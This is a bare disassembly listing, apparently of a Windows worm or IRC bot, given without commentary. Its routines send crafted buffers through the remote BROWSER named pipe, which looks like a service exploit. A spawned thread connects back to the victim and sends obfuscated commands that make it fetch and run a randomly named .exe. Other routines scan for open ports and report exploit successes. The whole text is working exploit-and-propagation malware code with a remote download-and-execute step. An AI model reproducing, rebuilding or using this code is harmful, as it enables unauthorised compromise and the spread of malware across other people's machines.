mov [ebp+var_D4], eax
push eax
lea eax, [ebp+var_B8]
push offset dword_43E170
push eax
mov [ebp+var_D6], 0Bh
mov [ebp+var_D5], 3
mov [ebp+var_D0], 48h
mov [ebp+var_CE], bx
mov [ebp+var_CC], ebx
mov [ebp+var_C8], 10B8h
mov [ebp+var_C6], 10B8h
mov [ebp+var_C4], ebx
mov [ebp+var_C0], 1
mov [ebp+var_BC], bx
mov [ebp+var_BA], 1
call sub_429350
push 10h
lea eax, [ebp+var_A4]
push offset dword_43E15C
push eax
mov [ebp+var_A8], 3
call sub_429350
add esp, 24h
lea eax, [ebp+var_DC]
mov [ebp+var_94], 2
push ebx
push eax
lea eax, [ebp+var_D8]
push 48h
push eax
push [ebp+arg_CC]
call dword_437078 ; WriteFile
test eax, eax
jz loc_406029
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_60DC]
push edi
push eax
push [ebp+arg_CC]
call dword_437084 ; ReadFile
push ebx
call sub_42A705
push eax
call sub_429ABF
push 14h
lea eax, [ebp+var_70]
push 41h
push eax
call sub_429690
push 1Ch
lea eax, [ebp+var_30]
push 41h
push eax
call sub_429690
add esp, 20h
call sub_429ACC
mov [ebp+var_70], eax
xor eax, eax
inc eax
cmp byte_43E0B0[esi], bl
mov dword ptr [ebp+var_68+4], eax
mov dword ptr [ebp+var_68], ebx
mov [ebp+var_6C], eax
mov [ebp+var_60], bx
jz short loc_405FCA
push 4
push offset dword_455384
jmp short loc_405FDC
; ---------------------------------------------------------------------------
loc_405FCA: ; CODE XREF: sub_405C6A+355�j
cmp byte_43E0B1[esi], bl
jz short loc_405FF1
push 2
pop eax
push 4
push offset loc_43E154
loc_405FDC: ; CODE XREF: sub_405C6A+35E�j
mov [ebp+var_2C], eax
mov [ebp+var_24], eax
lea eax, [ebp+var_20]
mov [ebp+var_28], ebx
push eax
call sub_429350
add esp, 0Ch
loc_405FF1: ; CODE XREF: sub_405C6A+366�j
call sub_429ACC
mov edi, 0FAh
cdq
mov ecx, edi
idiv ecx
inc edx
mov [ebp+var_30], edx
call sub_429ACC
cdq
idiv edi
mov eax, dword_43E0A4[esi]
mov [ebp+var_18], ebx
push eax
mov [ebp+var_4], eax
inc edx
mov [ebp+var_1C], edx
call sub_4296E8
mov edi, eax
pop ecx
cmp edi, ebx
jnz short loc_40603A
loc_406029: ; CODE XREF: sub_405C6A+2EF�j
push [ebp+arg_CC]
call dword_437044 ; CloseHandle
jmp loc_40638A
; ---------------------------------------------------------------------------
loc_40603A: ; CODE XREF: sub_405C6A+3BD�j
mov eax, [ebp+var_4]
add eax, 0FFFFFFFEh
push eax
push 90h
push edi
call sub_429690
mov eax, [ebp+var_4]
push 2
push ebx
lea eax, [edi+eax-2]
push eax
call sub_429690
mov eax, dword_43E0AC[esi]
push 7
add eax, edi
push offset dword_43E098
push eax
mov [ebp-8], eax
call sub_429350
push dword_43E0CC
mov eax, [ebp-8]
add eax, 7
push offset dword_43A8E8
push eax
call sub_429350
mov eax, dword_43E0A8[esi]
add esp, 30h
cmp byte_43E0B0[esi], bl
mov [ebp-8], eax
jz short loc_4060EC
push 4
add eax, edi
push offset dword_455374
push eax
call sub_429350
add dword ptr [ebp-8], 0Ch
mov esi, offset dword_43E0C8
mov eax, [ebp-8]
push 4
add eax, edi
push esi
push eax
call sub_429350
mov eax, [ebp-8]
push 4
push esi
lea eax, [eax+edi+24h]
push eax
mov [ebp-8], eax
call sub_429350
mov eax, [ebp-8]
push 4
add eax, 0Ch
push esi
push eax
call sub_429350
add esp, 30h
jmp short loc_40611C
; ---------------------------------------------------------------------------
loc_4060EC: ; CODE XREF: sub_405C6A+433�j
cmp byte_43E0B1[esi], bl
jz short loc_40611C
add eax, edi
mov dword ptr [ebp+var_10], 10h
mov [ebp-8], eax
mov esi, offset dword_43E0C8
loc_406105: ; CODE XREF: sub_405C6A+4B0�j
push 4
push esi
push dword ptr [ebp-8]
call sub_429350
add dword ptr [ebp-8], 4
add esp, 0Ch
dec dword ptr [ebp+var_10]
jnz short loc_406105
loc_40611C: ; CODE XREF: sub_405C6A+480�j
; sub_405C6A+488�j
mov eax, [ebp+var_4]
add eax, 42h
push eax
call sub_4296E8
mov esi, eax
pop ecx
cmp esi, ebx
mov dword ptr [ebp+var_10], esi
jnz short loc_40614A
push [ebp+arg_CC]
call dword_437044 ; CloseHandle
push edi
call sub_429822
pop ecx
jmp loc_40638A
; ---------------------------------------------------------------------------
loc_40614A: ; CODE XREF: sub_405C6A+4C6�j
mov eax, [ebp+var_4]
add eax, 42h
push eax
push ebx ; double
push esi
call sub_429690
lea eax, [ebp+var_70]
push 14h
push eax
push esi
call sub_429350
mov eax, [ebp+var_4]
mov [ebp-8], ebx
mov dword ptr [ebp+var_10+4], eax
add esp, 10h
fild [ebp+var_10+4]
fmul flt_437300
fstp [esp+10h+var_10]
call sub_42A636
call sub_42A910
push [ebp+var_4]
mov [esi+1Ch], eax
mov [esi+14h], eax
lea eax, [esi+20h]
push edi
push eax
mov [esi+18h], ebx
call sub_429350
mov eax, [ebp+var_4]
add esp, 14h
add eax, 20h
test al, 3
mov [ebp-8], eax
jz short loc_4061B4
loc_4061AC: ; CODE XREF: sub_405C6A+545�j
inc eax
test al, 3
jnz short loc_4061AC
mov [ebp-8], eax
loc_4061B4: ; CODE XREF: sub_405C6A+540�j
lea ecx, [ebp+var_30]
push 1Ch
add eax, esi
push ecx
push eax
call sub_429350
add dword ptr [ebp-8], 1Ch
push edi
call sub_429822
push 18h
lea eax, [ebp+var_48]
push ebx
push eax
call sub_429690
push 14h
lea eax, [ebp+var_5C]
push ebx
push eax
mov [ebp+var_48], 5
mov [ebp+var_47], bl
mov [ebp+var_46], bl
mov [ebp+var_45], 3
mov [ebp+var_44], 10h
mov [ebp+var_3E], bx
mov [ebp+var_3C], ebx
mov [ebp+var_34], bx
mov [ebp+var_32], 1Fh
call sub_429690
add esp, 28h
push ebx
push ebx
push 1
push ebx
call dword_437080 ; CreateEventA
mov [ebp+var_4C], eax
mov [ebp+var_4], ebx
jmp short loc_406223
; ---------------------------------------------------------------------------
loc_406220: ; CODE XREF: sub_405C6A+5F7�j
; sub_405C6A+63E�j
mov esi, dword ptr [ebp+var_10]
loc_406223: ; CODE XREF: sub_405C6A+5B4�j
cmp [ebp+var_4], 2
jge loc_406361
push 1
push 10B8h
push dword ptr [ebp-8]
inc [ebp+var_4]
push esi
lea esi, [ebp+var_48]
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_CC]
rep movsd
call sub_405B7C
add esp, 2Ch
test al, al
jz loc_40635E
cmp [ebp+var_4C], ebx
jz short loc_406220
lea eax, [ebp+var_5C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_60DC]
push 2000h
push eax
push [ebp+arg_CC]
call dword_437084 ; ReadFile
test eax, eax
jnz short loc_406298
call dword_43716C ; RtlGetLastWin32Error
cmp eax, 3E5h
jnz loc_40638A
loc_406298: ; CODE XREF: sub_405C6A+61B�j
push 64h
push [ebp+var_4C]
call dword_43707C ; WaitForSingleObject
cmp eax, 102h
jnz loc_406220
push 7D0h
call dword_43718C ; Sleep
movzx eax, word_443986
push eax
lea esi, [ebp+arg_8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
mov edx, [ebp+arg_B4]
add esp, 0C8h
mov eax, edx
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
shl eax, 6
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+arg_C4], ebx
mov ecx, [ecx]
jz short loc_40632D
cmp [ebp+arg_BC], ebx
jnz short loc_406335
push ecx
lea ecx, [ebp+arg_8]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD84
mov edx, [ebp+arg_B4]
add esp, 1Ch
loc_40632D: ; CODE XREF: sub_405C6A+697�j
cmp [ebp+arg_BC], ebx
jz short loc_406359
loc_406335: ; CODE XREF: sub_405C6A+69F�j
shl edx, 6
lea eax, [ebp+arg_8]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD0E
add esp, 1Ch
loc_406359: ; CODE XREF: sub_405C6A+6C9�j
xor eax, eax
inc eax
jmp short loc_40638C
; ---------------------------------------------------------------------------
loc_40635E: ; CODE XREF: sub_405C6A+5EE�j
mov esi, dword ptr [ebp+var_10]
loc_406361: ; CODE XREF: sub_405C6A+5BD�j
lea eax, [ebp+arg_8]
push eax
call sub_401E8E
mov edi, dword_437044
pop ecx
push [ebp+arg_CC]
call edi ; dword_437044
push esi
call sub_429822
cmp [ebp+var_4C], ebx
pop ecx
jz short loc_40638A
push [ebp+var_4C]
call edi ; dword_437044
loc_40638A: ; CODE XREF: sub_405C6A+167�j
; sub_405C6A+215�j ...
xor eax, eax
loc_40638C: ; CODE XREF: sub_405C6A+6F2�j
pop edi
pop esi
pop ebx
leave
retn
sub_405C6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406391 proc near ; CODE XREF: sub_406D50+46D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
push esi
inc ebx
push edi
lea eax, [ebp+arg_8]
push ebx
push eax
call sub_4044F6
pop ecx
test eax, eax
pop ecx
jnz short loc_4063B7
lea eax, [ebp+arg_8]
push 5
push eax
call sub_4044F6
pop ecx
pop ecx
loc_4063B7: ; CODE XREF: sub_406391+17�j
cmp eax, ebx
jnz short loc_4063BF
loc_4063BB: ; CODE XREF: sub_406391+31�j
push 0
jmp short loc_4063CA
; ---------------------------------------------------------------------------
loc_4063BF: ; CODE XREF: sub_406391+28�j
cmp eax, 2
jz short loc_4063BB
cmp eax, 3
jnz short loc_4063F3
push ebx
loc_4063CA: ; CODE XREF: sub_406391+2C�j
sub esp, 0C4h
lea esi, [ebp+arg_8]
push 31h
pop ecx
mov edi, esp
push [ebp+arg_4]
rep movsd
push [ebp+arg_0]
call sub_405C6A
add esp, 0D0h
test eax, eax
jz short loc_4063F3
mov eax, ebx
jmp short loc_4063F5
; ---------------------------------------------------------------------------
loc_4063F3: ; CODE XREF: sub_406391+36�j
; sub_406391+5C�j
xor eax, eax
loc_4063F5: ; CODE XREF: sub_406391+60�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_406391 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4063FA proc near ; DATA XREF: sub_4066B3+13C�o
var_6A0 = byte ptr -6A0h
var_2A0 = byte ptr -2A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 6A0h
mov eax, [ebp+arg_0]
push ebx
push esi
xor esi, esi
inc esi
push edi
mov [eax+0BCh], esi
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_429690
add esp, 0Ch
mov [ebp+var_10], 2
push dword_454F40
call dword_456F5C ; inet_addr
mov [ebp+var_C], eax
mov ax, word_443986
push eax
call dword_456F18 ; ntohs
push ebx
push esi
push 2
mov [ebp+var_E], ax
call dword_456FB0 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_406682
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_456E9C ; connect
cmp eax, 0FFFFFFFFh
jz loc_406682
push ebx
lea eax, [ebp+var_6A0]
push 400h
push eax
push edi
call dword_456F38 ; recv
call sub_429ACC
push 9
pop esi
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
idiv esi
lea eax, [ebp+var_2A0]
push edx
push offset dword_44399C
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_429A33
add esp, 20h
cmp dword_456D88, ebx
jnz loc_40658E
push dword_454F40
call sub_41E3FB
test eax, eax
pop ecx
mov [ebp+arg_0], offset dword_457CD8
jnz short loc_406503
mov [ebp+arg_0], offset dword_457C20
loc_406503: ; CODE XREF: sub_4063FA+100�j
lea eax, [ebp+var_2A0]
push eax
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
mov esi, offset aVxppy0owq7d ; "VxPpy0owQ7D/"
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
lea eax, [ebp+var_2A0]
push eax
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
call sub_401A77
push eax
call sub_401A77
push eax
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
mov esi, 190h
push dword_454A10
lea eax, [ebp+var_1A0]
push [ebp+arg_0]
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset aSSSDSSSSSSSSSS ; "%s %s %s %d >> %s %s %s %s %s >> %s %s "...
push esi
push eax
call sub_429AEE
add esp, 60h
jmp loc_40661B
; ---------------------------------------------------------------------------
loc_40658E: ; CODE XREF: sub_4063FA+E5�j
mov ebx, offset dword_456B88
push ebx
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
mov esi, offset aVxppy0owq7d ; "VxPpy0owQ7D/"
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
push ebx
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
push offset aEih0f1gakfp0 ; "EiH0f1GakFP0"
push esi
call sub_401AF0
push eax
push offset dword_456988
push offset dword_456788
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
mov esi, 190h
push dword_456780
lea eax, [ebp+var_1A0]
push offset dword_456580
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset aSSSDSSSSSSSS_0 ; "%s %s %s %d >> %s %s %s %s %s >> %s %s "...
push esi
push eax
call sub_429AEE
add esp, 6Ch
xor ebx, ebx
loc_40661B: ; CODE XREF: sub_4063FA+18F�j
lea eax, [ebp+var_1A0]
push ebx
push eax
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push edi
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz short loc_406682
push esi
call dword_43718C ; Sleep
lea eax, [ebp+var_2A0]
push eax
push offset aS_6 ; "%s\r\n"
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_429AEE
add esp, 10h
lea eax, [ebp+var_1A0]
push ebx
push eax
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push edi
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jnz short loc_406686
loc_406682: ; CODE XREF: sub_4063FA+5E�j
; sub_4063FA+74�j ...
xor eax, eax
jmp short loc_4066AC
; ---------------------------------------------------------------------------
loc_406686: ; CODE XREF: sub_4063FA+286�j
xor esi, esi
push ebx
lea eax, [ebp+var_6A0]
push 400h
inc esi
push eax
push edi
mov dword_455380, esi
call dword_456F38 ; recv
push edi
call dword_456FD0 ; closesocket
mov eax, esi
loc_4066AC: ; CODE XREF: sub_4063FA+28A�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_4063FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4066B3 proc near ; CODE XREF: sub_406D50+2CB�p
var_340 = byte ptr -340h
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
sub esp, 340h
lea eax, [ebp+arg_8]
push ebx
mov dword_454F40, eax
mov eax, [ebp+arg_BC]
mov dword_455378, eax
mov eax, [ebp+arg_C4]
mov dword_45537C, eax
mov eax, [ebp+arg_B4]
push esi
push edi
shl eax, 6
push 6
xor edi, edi
add eax, offset dword_43A357
push 1
push 2
mov [ebp+var_14], edi
mov dword_454AB8, eax
call dword_4372B8 ; socket
push 480h
mov esi, offset dword_454AC0
push edi
push esi
mov [ebp+var_8], 20804h
call sub_429690
push 42Ah
mov ebx, offset dword_454F48
push 0FFFFFF90h
push ebx
call sub_429690
lea eax, [ebp+arg_8]
push 5
push eax
call sub_4044F6
add esp, 20h
cmp eax, 9
mov [ebp+var_10], eax
jz short loc_4067B8
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_23C]
push offset aSPipe ; "\\\\%s\\PIPE"
push eax
call sub_429A33
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_340]
push offset aSPipeBrowser ; "\\\\%s\\PIPE\\BROWSER"
push eax
call sub_429A33
lea eax, [ebp+var_23C]
add esp, 18h
mov [ebp+var_20], eax
mov eax, offset byte_454A34
push edi
push eax
push eax
lea eax, [ebp+var_34]
push eax
mov [ebp+var_30], edi
mov [ebp+var_24], edi
mov [ebp+var_18], edi
call sub_428FFA
push edi
push edi
push 3
push edi
push edi
lea eax, [ebp+var_340]
push 0C0000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jnz short loc_4067BF
push eax
call dword_437044 ; CloseHandle
loc_4067B8: ; CODE XREF: sub_4066B3+8C�j
xor eax, eax
jmp loc_406C35
; ---------------------------------------------------------------------------
loc_4067BF: ; CODE XREF: sub_4066B3+FC�j
lea ecx, [ebp+var_4]
push edi
push ecx
lea ecx, [ebp+var_138]
push 104h
push ecx
push 48h
push offset dword_43E0F0
push eax
call dword_437058 ; TransactNamedPipe
test eax, eax
jz loc_406C2A
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+arg_8]
push edi
push eax
push offset sub_4063FA
push edi
push edi
call dword_43717C ; CreateThread
cmp [ebp+var_10], 2
jz loc_406A02
cmp [ebp+var_10], 1
jz loc_406A02
cmp [ebp+var_10], 3
jnz loc_406C20
push dword_43E13C
push offset dword_43A8E8
push ebx
call sub_429350
mov eax, [ebp+var_8]
push 4
add eax, 6
pop ebx
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push ebx
push eax
push offset dword_4551AC
call sub_429350
lea eax, [ebp+var_8]
push ebx
push eax
push offset dword_4551B8
call sub_429350
lea eax, [ebp+var_8]
push ebx
push eax
push offset dword_4551DC
call sub_429350
lea eax, [ebp+var_8]
push ebx
push eax
push offset dword_4551E8
call sub_429350
push 2
push offset dword_45538C
push offset dword_45520C
call sub_429350
add esp, 48h
lea eax, [ebp+var_4]
mov [ebp+var_4], 31Ch
push 2
push eax
push offset dword_43E0D8
call sub_429350
lea eax, [ebp+var_4]
push 2
push eax
push offset dword_43E0E0
mov [ebp+var_4], 304h
call sub_429350
push 18h
push offset dword_43E0D0
push esi
call sub_429350
mov esi, offset dword_43E1D0
push ebx
push esi
push offset dword_454AD8
call sub_429350
push ebx
push esi
push offset dword_454ADC
call sub_429350
mov edi, offset dword_455384
push ebx
push edi
push offset dword_454AE0
call sub_429350
add esp, 48h
push ebx
push esi
push offset dword_454AE4
call sub_429350
push ebx
push edi
push offset dword_454AE8
call sub_429350
push ebx
push offset dword_43E1C8
push offset dword_454AEC
call sub_429350
push ebx
push edi
push offset dword_454AF0
call sub_429350
push ebx
push offset dword_43E1C8
push offset dword_454AF4
call sub_429350
push 2C6h
push offset dword_454F48
push offset dword_454AF8
call sub_429350
add esp, 48h
push ebx
push esi
push offset dword_454DC0
call sub_429350
push ebx
push esi
push offset dword_454DC4
call sub_429350
push ebx
push edi
push offset dword_454DC8
call sub_429350
push ebx
push esi
push offset dword_454DCC
call sub_429350
push ebx
push edi
push offset dword_454DD0
call sub_429350
push ebx
push esi
push offset dword_454DD4
call sub_429350
add esp, 48h
push ebx
push edi
push offset dword_454DD8
call sub_429350
add esp, 0Ch
lea eax, [ebp+var_4]
mov ebx, 104h
mov esi, dword_437058
push 0
push eax
lea eax, [ebp+var_138]
push ebx
mov edi, 31Ch
push eax
push edi
push offset dword_454AC0
push [ebp+var_C]
call esi ; dword_437058
cmp [ebp+var_4], 0
jz short loc_4069F0
lea eax, [ebp+var_4]
push 0
push eax
lea eax, [ebp+var_138]
push ebx
push eax
push edi
push offset dword_454AC0
push [ebp+var_C]
call esi ; dword_437058
loc_4069F0: ; CODE XREF: sub_4066B3+322�j
push 7D0h
call dword_43718C ; Sleep
xor ebx, ebx
jmp loc_406B98
; ---------------------------------------------------------------------------
loc_406A02: ; CODE XREF: sub_4066B3+14D�j
; sub_4066B3+157�j
push dword_43E13C
push offset dword_43A8E8
push offset dword_4551A0
call sub_429350
add esp, 0Ch
mov edi, offset dword_455330
push 4
pop ebx
loc_406A22: ; CODE XREF: sub_4066B3+385�j
lea eax, [ebp+var_8]
push ebx
push eax
push edi
call sub_429350
add edi, ebx
add esp, 0Ch
cmp edi, offset dword_455370
jl short loc_406A22
lea eax, [ebp+var_4]
push 2
push eax
push offset dword_43E0D8
mov [ebp+var_4], 480h
call sub_429350
lea eax, [ebp+var_4]
push 2
push eax
push offset dword_43E0E0
mov [ebp+var_4], 464h
call sub_429350
push 18h
push offset dword_43E0D0
push esi
call sub_429350
mov esi, offset dword_43E1D0
push ebx
push esi
push offset dword_454AD8
call sub_429350
push ebx
push esi
push offset dword_454ADC
call sub_429350
mov edi, offset dword_455384
push ebx
push edi
push offset dword_454AE0
call sub_429350
add esp, 48h
push ebx
push esi
push offset dword_454AE4
call sub_429350
push ebx
push edi
push offset dword_454AE8
call sub_429350
push ebx
push offset dword_43E1C0
push offset dword_454AEC
call sub_429350
push ebx
push edi
push offset dword_454AF0
call sub_429350
push ebx
push offset dword_43E1C0
push offset dword_454AF4
call sub_429350
push 428h
push offset dword_454F48
push offset dword_454AF8
call sub_429350
add esp, 48h
push ebx
push esi
push offset dword_454F24
call sub_429350
push ebx
push offset dword_43E1B8
push offset dword_454F28
call sub_429350
push ebx
push edi
push offset dword_454F2C
call sub_429350
push ebx
push offset dword_43E1B8
push offset dword_454F30
call sub_429350
push ebx
push offset loc_43E154
push offset dword_454F34
call sub_429350
push ebx
push esi
push offset dword_454F38
call sub_429350
add esp, 48h
push ebx
push edi
push offset dword_454F3C
call sub_429350
add esp, 0Ch
xor ebx, ebx
lea eax, [ebp+var_4]
push ebx
push eax
lea eax, [ebp+var_138]
push 104h
push eax
push 480h
push offset dword_454AC0
push [ebp+var_C]
call dword_437058 ; TransactNamedPipe
push 7D0h
call dword_43718C ; Sleep
loc_406B98: ; CODE XREF: sub_4066B3+34A�j
cmp dword_455380, ebx
jz short loc_406C1D
mov edx, [ebp+arg_B4]
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov eax, edx
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
shl eax, 6
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp dword_45537C, ebx
mov ecx, [ecx]
jz short loc_406BF1
cmp dword_455378, ebx
jnz short loc_406BF9
push ecx
lea ecx, [ebp+arg_8]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD84
mov edx, [ebp+arg_B4]
add esp, 1Ch
loc_406BF1: ; CODE XREF: sub_4066B3+512�j
cmp dword_455378, ebx
jz short loc_406C1D
loc_406BF9: ; CODE XREF: sub_4066B3+51A�j
shl edx, 6
lea eax, [ebp+arg_8]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD0E
add esp, 1Ch
loc_406C1D: ; CODE XREF: sub_4066B3+4EB�j
; sub_4066B3+544�j
xor edi, edi
inc edi
loc_406C20: ; CODE XREF: sub_4066B3+161�j
lea eax, [ebp+arg_8]
push eax
call sub_401E8E
pop ecx
loc_406C2A: ; CODE XREF: sub_4066B3+12D�j
push [ebp+var_C]
call dword_437044 ; CloseHandle
mov eax, edi
loc_406C35: ; CODE XREF: sub_4066B3+107�j
pop edi
pop esi
pop ebx
leave
retn
sub_4066B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C3A proc near ; CODE XREF: sub_407252+3F�p
var_4 = byte ptr -4
arg_8 = byte ptr 10h
arg_110 = dword ptr 118h
arg_138 = dword ptr 140h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_110], 0FFFFFFFFh
push edi
jz loc_406D4D
push 0Ch
call sub_423737
test eax, eax
pop ecx
jnz loc_406D4D
xor edi, edi
cmp dword_457F48, edi
jnz short loc_406C89
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
pop ecx
call sub_429ACC
cdq
mov ecx, 9CBDh
idiv ecx
inc edx
mov dword_4555A4, edx
jmp short loc_406C95
; ---------------------------------------------------------------------------
loc_406C89: ; CODE XREF: sub_406C3A+2A�j
movzx eax, word_443982
mov dword_4555A4, eax
loc_406C95: ; CODE XREF: sub_406C3A+4D�j
push esi
mov esi, offset dword_455394
push 104h
push esi
push edi
mov dword_4555A0, edi
call dword_437178 ; GetModuleFileNameA
push 103h
push offset dword_443990
push offset dword_455498
call sub_429C40
lea eax, [ebp+arg_8]
push 7Fh
push eax
push offset dword_4555A8
mov dword_455634, edi
call sub_429C40
mov eax, [ebp+arg_138]
push esi
push dword_4555A4
mov dword_455638, eax
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push offset a5oke1awbzq ; "5OkE/1AWBZq/"
push offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
push offset aSSSIFileS_ ; "%s %s, %s: %i, File: %s."
push 0Ch
call sub_4233DE
add esp, 34h
mov dword_45559C, eax
lea eax, [ebp+var_4]
push eax
push edi
push offset dword_455390
push offset sub_402CBA
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, dword_45559C
pop esi
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz short loc_406D4D
jmp short loc_406D45
; ---------------------------------------------------------------------------
loc_406D3D: ; CODE XREF: sub_406C3A+111�j
push 32h
call dword_43718C ; Sleep
loc_406D45: ; CODE XREF: sub_406C3A+101�j
cmp dword_455634, edi
jz short loc_406D3D
loc_406D4D: ; CODE XREF: sub_406C3A+C�j
; sub_406C3A+1C�j ...
pop edi
leave
retn
sub_406C3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D50 proc near ; DATA XREF: sub_407252+B0�o
var_210 = byte ptr -210h
var_200 = byte ptr -200h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_14C = dword ptr -14Ch
var_144 = byte ptr -144h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 210h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Eh
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
rep movsd
xor esi, esi
push 10h
inc esi
push 0
mov [eax+134h], esi
mov eax, [ebp+var_14C]
mov [ebp+arg_0], eax
lea eax, [ebp+var_14]
push eax
call sub_429690
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_44]
call dword_456F18 ; ntohs
mov [ebp+var_12], ax
mov eax, [ebp+var_30]
push 6
push esi
push 2
mov [ebp+var_10], eax
call dword_456FB0 ; socket
push offset dword_457C20
mov edi, eax
push [ebp+var_30]
mov [ebp+var_4], edi
call dword_456FBC ; inet_ntoa
mov esi, dword_437174
push eax
call esi ; dword_437174
test eax, eax
jz loc_407249
push offset dword_457CD8
push [ebp+var_30]
call dword_456FBC ; inet_ntoa
push eax
call esi ; dword_437174
test eax, eax
jz loc_407249
cmp edi, 0FFFFFFFFh
jz loc_407238
lea eax, [ebp+var_14]
push 10h
push eax
push edi
call dword_456E9C ; connect
mov ecx, [ebp+var_38]
imul ecx, 2724h
cmp eax, 0FFFFFFFFh
mov dword_46D710[ecx], edi
jz loc_407238
cmp [ebp+var_20], 0
mov edi, offset aTarxm0mtxpp_ ; "tArXm0mtxpp."
mov ebx, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov esi, offset aSSSingleIpSSDO ; "%s %s single Ip: (%s) %s: (%d) open."
jnz short loc_406E5F
cmp [ebp+var_28], 0
jnz short loc_406E65
push [ebp+var_44]
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push [ebp+var_30]
call dword_456FBC ; inet_ntoa
push eax
push edi
push ebx
lea eax, [ebp+var_144]
push esi
